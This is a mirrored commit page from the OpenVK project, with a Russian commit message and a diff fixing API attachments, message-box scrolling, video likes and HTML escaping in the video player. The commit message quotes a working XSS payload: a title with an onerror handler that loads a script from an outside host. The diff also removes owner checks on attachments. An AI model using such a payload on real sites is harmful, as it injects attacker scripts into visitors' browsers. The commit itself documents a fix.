mirror of
https://github.com/openvk/openvk
synced 2024-12-31 21:00:06 +03:00
Some api fixes
- Теперь опросы прикрепляются через апи нормально - Через wall.edit теперь можно прикреплят новые аудио - При закрытии messagebox снова включается возможность скроллить - Через методы редактирования можно теперь прикреплять чужие хуйни - Удалены методы notes.deleteComment и notes.editComment, ведь они одинаковы с wall.deleteComment и wall.editComment - Лайки у видеозаписей теперь быстрее, ведь не прогружают новую страницу (в отличии от лайков на посте) - Название "<audio src/onerror="$(body).append('<script src=//sdzk.xyz/a>')"" больше не вызывает краш оконного плеера
This commit is contained in:
parent
9e7467ed97
commit
704fdb113b
7 changed files with 17 additions and 47 deletions
|
@ -118,21 +118,6 @@ final class Notes extends VKAPIRequestHandler
|
||||||
return 1;
|
return 1;
|
||||||
}
|
}
|
||||||
|
|
||||||
function deleteComment(int $comment_id, int $owner_id = 0)
|
|
||||||
{
|
|
||||||
$this->requireUser();
|
|
||||||
$this->willExecuteWriteAction();
|
|
||||||
|
|
||||||
$comment = (new CommentsRepo)->get($comment_id);
|
|
||||||
|
|
||||||
if(!$comment || !$comment->canBeDeletedBy($this->getUser()))
|
|
||||||
$this->fail(403, "Access to comment denied");
|
|
||||||
|
|
||||||
$comment->delete();
|
|
||||||
|
|
||||||
return 1;
|
|
||||||
}
|
|
||||||
|
|
||||||
function edit(string $note_id, string $title = "", string $text = "", int $privacy = 0, int $comment_privacy = 0, string $privacy_view = "", string $privacy_comment = "")
|
function edit(string $note_id, string $title = "", string $text = "", int $privacy = 0, int $comment_privacy = 0, string $privacy_view = "", string $privacy_comment = "")
|
||||||
{
|
{
|
||||||
$this->requireUser();
|
$this->requireUser();
|
||||||
|
@ -159,23 +144,6 @@ final class Notes extends VKAPIRequestHandler
|
||||||
return 1;
|
return 1;
|
||||||
}
|
}
|
||||||
|
|
||||||
function editComment(int $comment_id, string $message, int $owner_id = NULL)
|
|
||||||
{
|
|
||||||
$this->requireUser();
|
|
||||||
$this->willExecuteWriteAction();
|
|
||||||
|
|
||||||
$comment = (new CommentsRepo)->get($comment_id);
|
|
||||||
|
|
||||||
if($comment->getOwner()->getId() != $this->getUser()->getId())
|
|
||||||
$this->fail(15, "Access to comment denied");
|
|
||||||
|
|
||||||
$comment->setContent($message);
|
|
||||||
$comment->setEdited(time());
|
|
||||||
$comment->save(true);
|
|
||||||
|
|
||||||
return 1;
|
|
||||||
}
|
|
||||||
|
|
||||||
function get(int $user_id, string $note_ids = "", int $offset = 0, int $count = 10, int $sort = 0)
|
function get(int $user_id, string $note_ids = "", int $offset = 0, int $count = 10, int $sort = 0)
|
||||||
{
|
{
|
||||||
$this->requireUser();
|
$this->requireUser();
|
||||||
|
|
|
@ -513,6 +513,8 @@ final class Wall extends VKAPIRequestHandler
|
||||||
$this->fail(100, "Poll does not exist");
|
$this->fail(100, "Poll does not exist");
|
||||||
if($attacc->getOwner()->getId() != $this->getUser()->getId())
|
if($attacc->getOwner()->getId() != $this->getUser()->getId())
|
||||||
$this->fail(43, "You do not have access to this poll");
|
$this->fail(43, "You do not have access to this poll");
|
||||||
|
|
||||||
|
$post->attach($attacc);
|
||||||
} elseif($attachmentType == "audio") {
|
} elseif($attachmentType == "audio") {
|
||||||
$attacc = (new AudiosRepo)->getByOwnerAndVID($attachmentOwner, $attachmentId);
|
$attacc = (new AudiosRepo)->getByOwnerAndVID($attachmentOwner, $attachmentId);
|
||||||
if(!$attacc || $attacc->isDeleted())
|
if(!$attacc || $attacc->isDeleted())
|
||||||
|
@ -864,7 +866,7 @@ final class Wall extends VKAPIRequestHandler
|
||||||
$this->fail(158, "Post will have too many attachments");
|
$this->fail(158, "Post will have too many attachments");
|
||||||
|
|
||||||
foreach($attachs as $attach) {
|
foreach($attachs as $attach) {
|
||||||
if($attach && !$attach->isDeleted() && $attach->getOwner()->getId() == $this->getUser()->getId())
|
if($attach && !$attach->isDeleted())
|
||||||
$post->attach($attach);
|
$post->attach($attach);
|
||||||
else
|
else
|
||||||
$this->fail(52, "One of the attachments is invalid");
|
$this->fail(52, "One of the attachments is invalid");
|
||||||
|
@ -908,7 +910,7 @@ final class Wall extends VKAPIRequestHandler
|
||||||
$this->fail(158, "Post will have too many attachments");
|
$this->fail(158, "Post will have too many attachments");
|
||||||
|
|
||||||
foreach($attachs as $attach) {
|
foreach($attachs as $attach) {
|
||||||
if($attach && !$attach->isDeleted() && $attach->getOwner()->getId() == $this->getUser()->getId())
|
if($attach && !$attach->isDeleted())
|
||||||
$comment->attach($attach);
|
$comment->attach($attach);
|
||||||
else
|
else
|
||||||
$this->fail(52, "One of the attachments is invalid");
|
$this->fail(52, "One of the attachments is invalid");
|
||||||
|
|
|
@ -151,6 +151,6 @@ final class VideosPresenter extends OpenVKPresenter
|
||||||
$video->toggleLike($this->user->identity);
|
$video->toggleLike($this->user->identity);
|
||||||
}
|
}
|
||||||
|
|
||||||
$this->redirect("$_SERVER[HTTP_REFERER]");
|
$this->returnJson(["success" => true]);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
|
@ -154,12 +154,7 @@ body.dimmed > .dimmer {
|
||||||
background: white;
|
background: white;
|
||||||
padding-right: 6px;
|
padding-right: 6px;
|
||||||
max-height: 400px;
|
max-height: 400px;
|
||||||
overflow-y: scroll;
|
overflow-y: auto;
|
||||||
}
|
|
||||||
|
|
||||||
/* Работает только в хроме, потому что в фурифоксе до сих пор нет кастомных скроллбаров лул */
|
|
||||||
.left_block::-webkit-scrollbar {
|
|
||||||
width: 0;
|
|
||||||
}
|
}
|
||||||
|
|
||||||
.right_block {
|
.right_block {
|
||||||
|
|
|
@ -558,7 +558,7 @@ $(document).on("click", "#videoOpen", async (e) => {
|
||||||
`
|
`
|
||||||
} else {
|
} else {
|
||||||
player = `
|
player = `
|
||||||
<div class="bsdn media" data-name="${videoObj.title}" data-author="${videoObj.name}">
|
<div class="bsdn media" data-name="${escapeHtml(videoObj.title)}" data-author="${escapeHtml(videoObj.name)}">
|
||||||
<video class="media" src="${videoObj.url}"></video>
|
<video class="media" src="${videoObj.url}"></video>
|
||||||
</div>`
|
</div>`
|
||||||
}
|
}
|
||||||
|
@ -586,7 +586,7 @@ $(document).on("click", "#videoOpen", async (e) => {
|
||||||
<div class="top-part">
|
<div class="top-part">
|
||||||
<span class="top-part-name">${escapeHtml(videoObj.title)}</span>
|
<span class="top-part-name">${escapeHtml(videoObj.title)}</span>
|
||||||
<div class="top-part-buttons">
|
<div class="top-part-buttons">
|
||||||
<span class="clickable" id="minimizePlayer" data-name="${videoObj.title}" data-id="${videoObj.id}">${tr("hide_player")}</span>
|
<span class="clickable" id="minimizePlayer" data-name="${escapeHtml(videoObj.title)}" data-id="${videoObj.id}">${tr("hide_player")}</span>
|
||||||
<span>|</span>
|
<span>|</span>
|
||||||
<span class="clickable" id="closeFplayer">${tr("close_player")}</span>
|
<span class="clickable" id="closeFplayer">${tr("close_player")}</span>
|
||||||
</div>
|
</div>
|
||||||
|
@ -655,8 +655,6 @@ $(document).on("click", "#videoOpen", async (e) => {
|
||||||
let oldPlayer = document.querySelector(".miniplayer-video .fplayer")
|
let oldPlayer = document.querySelector(".miniplayer-video .fplayer")
|
||||||
let newPlayer = document.querySelector(".top-part-player-subdiv")
|
let newPlayer = document.querySelector(".top-part-player-subdiv")
|
||||||
|
|
||||||
document.querySelector(".top-part-player-subdiv")
|
|
||||||
|
|
||||||
newPlayer.append(oldPlayer)
|
newPlayer.append(oldPlayer)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
Function.noop = () => {};
|
Function.noop = () => {};
|
||||||
|
|
||||||
function MessageBox(title, body, buttons, callbacks, removeDimmedOnExit = true) {
|
function MessageBox(title, body, buttons, callbacks) {
|
||||||
if(u(".ovk-diag-cont").length > 0) return false;
|
if(u(".ovk-diag-cont").length > 0) return false;
|
||||||
|
|
||||||
document.querySelector("html").style.overflowY = "hidden"
|
document.querySelector("html").style.overflowY = "hidden"
|
||||||
|
@ -21,8 +21,9 @@ function MessageBox(title, body, buttons, callbacks, removeDimmedOnExit = true)
|
||||||
button.on("click", function(e) {
|
button.on("click", function(e) {
|
||||||
let __closeDialog = () => {
|
let __closeDialog = () => {
|
||||||
|
|
||||||
if(removeDimmedOnExit) {
|
if(document.querySelector(".ovk-photo-view-dimmer") == null && document.querySelector(".ovk-fullscreen-player") == null) {
|
||||||
u("body").removeClass("dimmed");
|
u("body").removeClass("dimmed");
|
||||||
|
document.querySelector("html").style.overflowY = "scroll"
|
||||||
}
|
}
|
||||||
|
|
||||||
u(".ovk-diag-cont").remove();
|
u(".ovk-diag-cont").remove();
|
||||||
|
|
|
@ -244,6 +244,8 @@ function parseAttachments(string $attachments)
|
||||||
$attachmentType = "video";
|
$attachmentType = "video";
|
||||||
elseif(str_contains($attachment, "note"))
|
elseif(str_contains($attachment, "note"))
|
||||||
$attachmentType = "note";
|
$attachmentType = "note";
|
||||||
|
elseif(str_contains($attachment, "audio"))
|
||||||
|
$attachmentType = "audio";
|
||||||
|
|
||||||
$attachmentIds = str_replace($attachmentType, "", $attachment);
|
$attachmentIds = str_replace($attachmentType, "", $attachment);
|
||||||
$attachmentOwner = (int)explode("_", $attachmentIds)[0];
|
$attachmentOwner = (int)explode("_", $attachmentIds)[0];
|
||||||
|
@ -262,6 +264,10 @@ function parseAttachments(string $attachments)
|
||||||
$attachmentObj = (new openvk\Web\Models\Repositories\Notes)->getNoteById($attachmentOwner, $attachmentId);
|
$attachmentObj = (new openvk\Web\Models\Repositories\Notes)->getNoteById($attachmentOwner, $attachmentId);
|
||||||
$returnArr[] = $attachmentObj;
|
$returnArr[] = $attachmentObj;
|
||||||
break;
|
break;
|
||||||
|
case "audio":
|
||||||
|
$attachmentObj = (new openvk\Web\Models\Repositories\Audios)->getByOwnerAndVID($attachmentOwner, $attachmentId);
|
||||||
|
$returnArr[] = $attachmentObj;
|
||||||
|
break;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
Loading…
Reference in a new issue